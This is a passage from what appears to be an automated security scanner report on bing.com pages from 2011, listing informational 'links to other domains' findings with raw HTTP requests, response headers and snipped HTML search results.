<a id="srs_rpt1_ctl06_sritem_ec2_ohlWeb" href="http://www.limarestaurant.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x219981357', '6', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl07_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl07_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3125548\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3D147c0045befc4bdcb48dadffb4dcce83\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3125548', '7', '');" Width="75" align="center" src="http://images.travelnow.com/hotels/1000000/20000/10100/10072/10072_26_t.jpg" style="border-width:0px;" />
<a id="srs_rpt1_ctl07_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl07_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl07_sritem_ec2_ohlWeb" href="http://phoenixparkhotel.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3125548', '7', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl08_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl08_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3134319\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3D147c0045befc4bdcb48dadffb4dcce83\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3134319', '8', '');" Width="75" align="center" src="http://blufiles.storage.msn.com/y1pAxFO0FPqP-0U3ChD2uMxfKnF6U_17DHSxyLqwMSUUgZW35ZQklkcmjNQIPiPVUvGaBoe4-nAuQ-8PZPDQ7RTAQ" style="border-width:0px;" />
<a id="srs_rpt1_ctl08_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl08_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl08_sritem_ec2_ohlWeb" href="http://www.cafeatlantico.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3134319', '8', ''); " target="_self">Website</a>
...[SNIP]...
</a>

<a id="srs_rpt1_ctl08_sritem_ec2_ohlMenu" class=" ecDotDynamic" href="http://washingtondc.citysearch.com/profile/menu/2131085/washington_dc/cafe_atlantico.html" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3134319', '8', ''); ">Menu</a>
...[SNIP]...
<div id="srs_rpt1_ctl09_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl09_sritem_ec2_ohlWeb" href="http://www.acadianarestaurant.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x4495742', '9', ''); " target="_self">Website</a>
...[SNIP]...
</a>

<a id="srs_rpt1_ctl09_sritem_ec2_ohlMenu" class=" ecDotDynamic" href="http://www.acadianarestaurant.com/dinner.html" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x4495742', '9', ''); ">Menu</a>
...[SNIP]...
wMDU0OUE=" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '2', 'YellowPages-LSV', 'DWLPAV');"><img id="SecondaryAdResultSetControl_rpt1_ctl02_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC92973.gif" style="border-width:0px;" /></a>
...[SNIP]...
<div id="SecondaryAdResultSetControl_adsSponsored" class="adsSponsoredContainer">
<a id="SecondaryAdResultSetControl_adsSponsoredLabel" class="adsSponsoredLink" href="http://listings.yellowpages.com/documents/special_offers/jump-msn.asp?from=maps_localsearch_com" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', ''); ">Advertise here</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=washington%2c%20dc%2c%20us&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3dwashington%252c%2bdc%252c%2bus%26cat%3d11168%26q%3dRestaurants%26maxcount%3d4797%26FORM%3dLLSV" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,64.1')">Tell us what you think</a>
...[SNIP]...

3.4. http://www.bing.com/maps/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps/default.aspx?encType=1&where1=Boston%2c+Massachusetts+02110&cp=42.355957~-71.054100&FORM=MIRE1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=02110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FLCASET=Mon%2c+01+Jan+0001+06%3a00%3a00+GMT; FLCASID=ab8b01fc3dc64a86bedff0d1da7af5b9; SL=true; htsk=false; cbout=false; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: d9c89cedfbf14e8b9f8be7d3d9a2993d
X-Ve-Server: BL2-01212-20110317.509-0
X-UA-Compatible: IE=7, IE=9
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:05:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,51.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,53.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,55.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,57.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,59.1')">About our ads</a>
...[SNIP]...

3.5. http://www.bing.com/profile/history  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /profile/history

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /profile/history?q=Restaurants&FORM=O2FD HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/us/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 29337
Date: Sat, 26 Mar 2011 01:04:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,99.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,101.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808483.aspx" onmousedown="return si_T('&amp;ID=SERP,5106.1')">Your search history</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,114.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,116.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,118.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,120.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,122.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,124.1')">Help</a>
...[SNIP]...

3.6. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=events&FORM=O1RE3 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1426&bIm=915

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:05:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<h3><a href="http://eventful.com/" onmousedown="return si_T('&amp;ID=SERP,5093.1')">Local <strong>
...[SNIP]...
<h3><a href="http://www.events.org/" onmousedown="return si_T('&amp;ID=SERP,5148.1')"><strong>
...[SNIP]...
<h3><a href="http://www.washingtonpost.com/gog/dc-events.html" onmousedown="return si_T('&amp;ID=SERP,5202.1')">Washington <strong>
...[SNIP]...
<h3><a href="http://events.mercurynews.com/" onmousedown="return si_T('&amp;ID=SERP,5256.1')">San Jose Entertainment &amp; <strong>
...[SNIP]...
<h3><a href="http://washington.org/visiting/events-calendar" onmousedown="return si_T('&amp;ID=SERP,5274.1')"><strong>
...[SNIP]...
<h3><a href="http://events.charlotteobserver.com/" onmousedown="return si_T('&amp;ID=SERP,5328.1')">Charlotte Entertainment &amp; <strong>
...[SNIP]...
<h3><a href="http://washington.dc.eventguide.com/" onmousedown="return si_T('&amp;ID=SERP,5356.1')">Washington <strong>
...[SNIP]...
<h3><a href="http://upcoming.yahoo.com/" onmousedown="return si_T('&amp;ID=SERP,5410.1')">Upcoming: Local <strong>
...[SNIP]...
<h3><a href="http://events.jdnews.com/" onmousedown="return si_T('&amp;ID=SERP,5438.1')">Things To Do In Jacksonville, NC - Coastal Carolina <strong>
...[SNIP]...
<h3><a href="http://events.woai.com/" onmousedown="return si_T('&amp;ID=SERP,5467.1')">Upcoming <strong>
...[SNIP]...
<h5><a href="http://www.sfgate.com/cgi-bin/blogs/ski/detail?entry_id=85804" onmousedown="return si_T('&amp;ID=SERP,5609.1')">Spring <strong>
...[SNIP]...
<h5><a href="http://www.nytimes.com/2011/03/27/nyregion/0327listingsct.html" onmousedown="return si_T('&amp;ID=SERP,5612.1')"><strong>
...[SNIP]...
<h5><a href="http://www.sun-sentinel.com/news/palm-beach/boca-raton/fl-fire-expo-boca-20110325,0,4029925.story?track=rss" onmousedown="return si_T('&amp;ID=SERP,5614.1')">Boca Raton Fire Rescue Expo to feature demonstrations, kids' <strong>
...[SNIP]...
<h3><a href="http://358245.r.msn.com/?ld=4vTTvbvnlI_kpqJNqlhD2-0ZUGJJE-d6nijixmw6XyruPVHI7sCYki5KqFqxVLY5NjzjtFIlpmjbflnMDqvGlssalY0uH0iPfBdDFctXu_bsosdZyR2TZd5gDn7tSaCBg9l1Nsp1j82ESvYvyvIvLfRZ2aa9A7vzDJ3hsZW2sFhcaADsIZxxSF-bNnO_sJ8DOYU1PsqFxogm-EKFKDZUj_YSUjnRDWukem-FyqqUSA5paR8aJQbAC35YGsxrfGz3NX6rXPFaBh6jtxA7UUQdT9fRmogyyJp6Av7D0xPniD4dlMnoUERgZmCxoqIjQBk-LNGXr7Ticl8sdcxXpJsV1w93q7PKhH_DcuKBAXzKaPhpNPxLKFIhGMOAat5wGuQ8BZ5DXqA1cnbsVB_Lgapf_YOXxV95RBPP0uBB_-vbxLPmdzCqMU-uk08wv6eU5UFEqHP6QalCiDwsY2AAe7leo0N0QePZ1cOV4T7V0MfZiVGvDhPFPuO3OAaqFvlM5VdqCMcsYSDfSEvKvidezIBLwoSakI5MduKMYLEcttlnIdWvc1VAlMefR7ek56hOJxgc2eMYnElhAmY3M9gWaGyVHddvsXIMtQXqGTy54eF9wxxvXzGphFW5pjlUk" onmousedown="return si_T('&amp;ID=FD,61.1,Ads')">special <strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vJoUFFMoydr-tFYv4OICssvbPomoQTEIgcsVCYo2ZQyT-i_m3LC0BtdMenOxmi79AgttdsfRajSuUJAf5nZOLM03rM2Z4tchcmdPCJkDkySQU2DDSESwRUzQ8gipiqurf5Z4ojWZBff8PnQZmRh55AtjZy6U8eKKL853D6LsvqH70lBAWs5wVgE5GJNzw2wVYap6bQLh-PFzDImDyM5OZ9Ww3Q_ClxMA70cdikTpmVLN6wkee1P-a_e81BDIELutIjdhBieh7Kafeswt5NjSqQTVUCUxYblfKn5mPJWStBiMic8W0ECZjcz0U97NvOgrkRjBnuSdxRtoYqXitz0qvNEDWeXevs9O-zQ" onmousedown="return si_T('&amp;ID=FD,63.1,Ads')">2010 Classic Car Shows</a>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,59.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,114.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,116.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,118.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,120.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,122.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,124.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=events&amp;P3=ecalgobadge2&amp;P4=O1RE3&amp;P5=FA3AE6176FAC4414AD6FC26C726B4B15&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3devents%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,126.1')">Tell us what you think</a>
...[SNIP]...

3.7. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=James+Dean&FORM=Z9LH8 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1426&bIm=915; RMS=F=Oi&A=AAAAAAAAAAAQ

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:04:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div><a href="http://today.msnbc.msn.com/id/42269628/ns/today-entertainment/" class="entry-title" rel="bookmark" onmousedown="return si_T('&amp;ID=SERP,5562.1')">Elizabeth Taylor...s Secret About <strong>
...[SNIP]...
<div class="ans_msnmm"><a href="http://today.msnbc.msn.com/id/42269628/ns/today-entertainment/" onmousedown="return si_T('&amp;ID=SERP,5562.2')"><img title="Image: Elizabeth Taylor &amp; James Dean in ...Giant... (.. Reuters)" width="230" height="162" src="/caption/image?bn=RTImage&amp;bid=soYXIwYry6k5LA"/>
...[SNIP]...
<h5><a href="http://movies.msn.com/celebrities/celebrity-biography/james-dean.1/" onmousedown="return si_T('&amp;ID=SERP,5564.1')">James Dean biography</a>
...[SNIP]...
<h5><a href="http://movies.msn.com/celebrities/celebrity/james-dean.1/" onmousedown="return si_T('&amp;ID=SERP,5565.1')">James Dean on MSN Movies</a>
...[SNIP]...
<h5><a href="http://www.popeater.com/2011/03/25/elizabeth-taylors-secret-james-dean/?icid=maing%7Cmain5%7Cdl2%7Csec1_lnk3%7C51840" onmousedown="return si_T('&amp;ID=SERP,5453.1')">Elizabeth Taylor's Dark Secret About <strong>
...[SNIP]...
<h5><a href="http://www.cbsnews.com/8301-31749_162-20047273-10391698.html" onmousedown="return si_T('&amp;ID=SERP,5456.1')">Elizabeth Taylor: <strong>
...[SNIP]...
<h5><a href="http://today.msnbc.msn.com/id/42269628/42265672" onmousedown="return si_T('&amp;ID=SERP,5458.1')"><strong>
...[SNIP]...
<h3><a href="http://jamesdean.com/" onmousedown="return si_T('&amp;ID=SERP,5087.1')">The Official Website of <strong>
...[SNIP]...
<h3><a href="http://en.wikipedia.org/wiki/James_Dean" onmousedown="return si_T('&amp;ID=SERP,5155.1')"><strong>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/James_Dean#Early_life" onmousedown="return si_T('&amp;ID=SERP,5106.1')">Early life</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/James_Dean#Acting_career" onmousedown="return si_T('&amp;ID=SERP,5107.1')">Acting career</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/James_Dean#Racing_career_and_.27Little_Bastard.27" onmousedown="return si_T('&amp;ID=SERP,5108.1')">Racing career and ...</a>
...[SNIP]...
<li><a href="http://en.wikipedia.org/wiki/James_Dean#Personal_relationships" onmousedown="return si_T('&amp;ID=SERP,5109.1')">Personal relationships</a>
...[SNIP]...
<h3><a href="http://www.huffingtonpost.com/2011/03/25/james-dean-molested-by-minister_n_840495.html?ref=tw" onmousedown="return si_T('&amp;ID=SERP,5176.1')"><strong>
...[SNIP]...
<h3><a href="http://www.answers.com/topic/james-dean" onmousedown="return si_T('&amp;ID=SERP,5206.1')"><strong>
...[SNIP]...
<h3><a href="http://www.imdb.com/name/nm0000015/" onmousedown="return si_T('&amp;ID=SERP,5273.1')"><strong>
...[SNIP]...
<div class="badge bA"><a href="http://www.imdb.com/name/nm0000015/" onmousedown="return si_T('&amp;ID=SERP,5243.1')"><div class="t_pane">
...[SNIP]...
<li><a href="http://www.imdb.com/name/nm0000015/news" onmousedown="return si_T('&amp;ID=SERP,5238.1')">News</a>
...[SNIP]...
<li><a href="http://www.imdb.com/name/nm0000015/mediaindex" onmousedown="return si_T('&amp;ID=SERP,5234.1')">130 photos</a>
...[SNIP]...
<li><a href="http://www.imdb.com/name/nm0000015/bio" onmousedown="return si_T('&amp;ID=SERP,5235.1')">Biography</a>
...[SNIP]...
<li><a href="http://www.imdb.com/name/nm0000015/awards" onmousedown="return si_T('&amp;ID=SERP,5236.1')">Awards</a>
...[SNIP]...
<h3><a href="http://jamesdeangallery.com/" onmousedown="return si_T('&amp;ID=SERP,5319.1')">About the <strong>
...[SNIP]...
<h3><a href="http://www.imdb.com/title/tt0240628/" onmousedown="return si_T('&amp;ID=SERP,5360.1')"><strong>
...[SNIP]...
<div class="badge bB"><a href="http://www.imdb.com/title/tt0240628/" onmousedown="return si_T('&amp;ID=SERP,5356.1')"><div class="pane">
...[SNIP]...
<h3><a href="http://www.thirdage.com/news/james-dean-molested-minister-elizabeth-taylor-revealed_3-25-2011" onmousedown="return si_T('&amp;ID=SERP,5381.1')"><strong>
...[SNIP]...
<h3><a href="http://www.americanlegends.com/jamesdean/" onmousedown="return si_T('&amp;ID=SERP,5400.1')">American Legends: <strong>
...[SNIP]...
<h3><a href="http://countyhistorian.com/cecilweb/index.php/James_Dean" onmousedown="return si_T('&amp;ID=SERP,5428.1')"><strong>
...[SNIP]...
<span class="vt_con"><a href="http://www.youtube.com/watch?v=quryApDlkrU" class="vt_tl" onmouseover="VT.hover(this,'http:\/\/ts1.mm.bing.net\/videos\/thumbnail.aspx?q=535977132296&amp;id=1e62bde663039d41b004c05030279358&amp;bid=5ysFhVnRyoNFcw&amp;bn=MotionThumb&amp;url=http%3a%2f%2fwww.youtube.com%2fwatch%3fv%3dquryApDlkrU', 0);" style="width:120px;height:80px;" onmousedown="return si_T('&amp;ID=SERP,5485.1')"><span class="vt_vp">
...[SNIP]...
<div class="sc_m12"><a href="http://www.youtube.com/watch?v=quryApDlkrU" title="If I'm James Dean, You're Audrey Hepburn - Sleeping With Sirens ..." onmousedown="return si_T('&amp;ID=SERP,5485.2')">If I'm James Dean, You're Audrey Hepburn - Sleeping With Sirens ...</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,105.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,107.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,109.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,111.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,113.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,115.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=James+Dean&amp;P3=ecalgobadge2&amp;P4=Z9LH8&amp;P5=FA3AE6176FAC4414AD6FC26C726B4B15&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dJames+Dean%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,117.1')">Tell us what you think</a>
...[SNIP]...

3.8. http://www.bing.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=Zip+Code+02110&FORM=R5FD1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
